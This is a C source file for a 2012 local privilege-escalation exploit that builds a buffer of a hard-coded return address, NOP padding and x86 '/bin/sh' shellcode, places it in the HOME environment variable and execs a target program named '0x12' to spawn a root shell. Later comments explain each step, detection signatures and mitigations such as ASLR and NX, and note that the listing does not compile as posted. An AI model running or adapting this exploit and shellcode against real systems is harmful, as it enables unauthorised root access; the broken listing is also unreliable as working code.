  1. /********************************************************************************/
  2. /* 0x12 (sh1ts4uce) exploit by phyrrus9 */
  3. /* Copyright(c) 2012 phyrrus9 and the Private Dev Team */
  4. /* */
  5. /*This program will execute a standard buffer overflow and spawn a root shell by*/
  6. /*using a standard ramdisk block with the placement of NOP characters at needed */
  7. /*locations allowing the device to jump straight to the shell execution code and*/
  8. /*spawn the root shell. This is then handled by some other magical force in the*/
  9. /*universe. This code is NOT public, and shall never be as I dont want to show */
  10. /*anybody the work I do because I am a lazy asshole and you can just shove it if*/
  11. /*you have a problem about it. Have a nice day and thank you for your time!!!!!*/
  12. /* */
  13. /* If you have questions or concerns, email me at <phyrrus9@gmail.com> */
  14. /********************************************************************************/
  15. #include <stdio.h>
  16. #include <unistd.h>
  17. #include <stdlib.h>
  /*
   * Payload bytes: 32-bit x86 machine code. The bytes cd 80 are the Linux
   * i386 `int 0x80` system-call instruction and the bytes 2f 62 69 6e 2f 73 68
   * near the end spell "/bin/sh"; this appears to be the widely published
   * shell-spawning stub from introductory stack-overflow tutorials.
   * Detection: both byte runs are long-standing IDS/AV signatures.
   */
  18. static char shellcode[]=
  19. "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
  20. "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
  /* x86 single-byte no-op opcode, used in main() as padding in front of the
     payload. A long run of 0x90 bytes in an environment variable or argument
     is a classic indicator of this technique. */
  21. #define NOP 0x90
  /* Size in bytes of the crafted buffer built in main(). */
  22. #define LEN 1032
  /* Hard-coded address that main() writes repeatedly into the buffer. The value
     lies just below 0xc0000000, where 32-bit Linux places the top of the user
     stack, so it is presumably a guessed stack location (not verifiable from
     this file). ASLR invalidates a fixed guess like this, and a non-executable
     stack (NX) stops injected bytes from running even when the guess is right. */
  23. #define RET 0xbffff574
  /*
   * Entry point. Fills a LEN-byte stack buffer in three passes (the RET value
   * repeated, then NOP padding from the start, then the shellcode bytes),
   * exports it as the HOME environment variable and execs a program named
   * "0x12" resolved through PATH. `return 0` is reached only if execlp() fails.
   *
   * Defender's reading: this has an effect only if "0x12" copies $HOME into a
   * fixed-size stack buffer without a length check -- presumably the case, but
   * the target's source is not on this page. The fix belongs in that program:
   * treat environment variables as untrusted input, bound every copy, and run
   * it with stack protector, a non-executable stack and ASLR enabled.
   *
   * NOTE(review): the listing does not compile as posted -- line 40 has an
   * unbalanced ')' and strlen()/memcpy() are used without <string.h>. The
   * 4-byte stride combined with long-sized stores also assumes a 32-bit
   * target (sizeof(long) == 4).
   */
  24. int main()
  25. {
  26. fprintf(stderr, "Initializing 0x21");
  27. char buffer[LEN];
  28. long retaddr = RET;
  29. int i;
  30. fprintf(stderr, "============================");
  31. fprintf(stderr, "Initialized!!!!!");
  32. fprintf(stderr,"using address 0x%lx\n",retaddr);
  33. fprintf(stderr, "Preload begin stage one ");
  /* Pass 1: store retaddr at every 4-byte offset of the buffer. */
  34. /*flood*/
  35. for (i=0;i<LEN;i+=4)
  36. *(long *)&buffer[i] = retaddr;
  37. fprintf(stderr, "flooded buffer with returns ");
  38. fprintf(stderr, "begin stage two ");
  /* Pass 2: overwrite from offset 0 with NOP bytes, stopping
     strlen(shellcode) + 100 bytes short of the end so the tail of the buffer
     keeps the repeated address from pass 1. */
  39. /* a little puzzle piecing */
  40. for (i=0;i<LEN-strlen(shellcode)-100);i++)
  41. *(buffer+i) = NOP;
  42. fprintf(stderr, "placed padding on exploit ");
  43. fprintf(stderr, "begin stage three ");
  /* Pass 3: copy the payload directly after the padding; i still holds the
     index at which pass 2 stopped. */
  44. /* place the exploit */
  45. memcpy(buffer+i,shellcode,strlen(shellcode));
  46. fprintf(stderr, "copied exploit to ramdisk ");
  47. fprintf(stderr, "begin stage four ");
  /* Replace HOME with the crafted buffer (third argument 1 = overwrite an
     existing value). An environment value this long and full of non-printable
     bytes is itself a useful detection signal. */
  48. setenv("HOME", buffer, 1);
  49. fprintf(stderr, "Final stage begin ");
  50. fprintf(stderr, "Execute exploit and spawn #");
  /* Replace this process with the target program, which inherits the modified
     environment. The return value is not checked. */
  51. execlp("0x12","0x12",NULL);
  52. return 0;
  53. }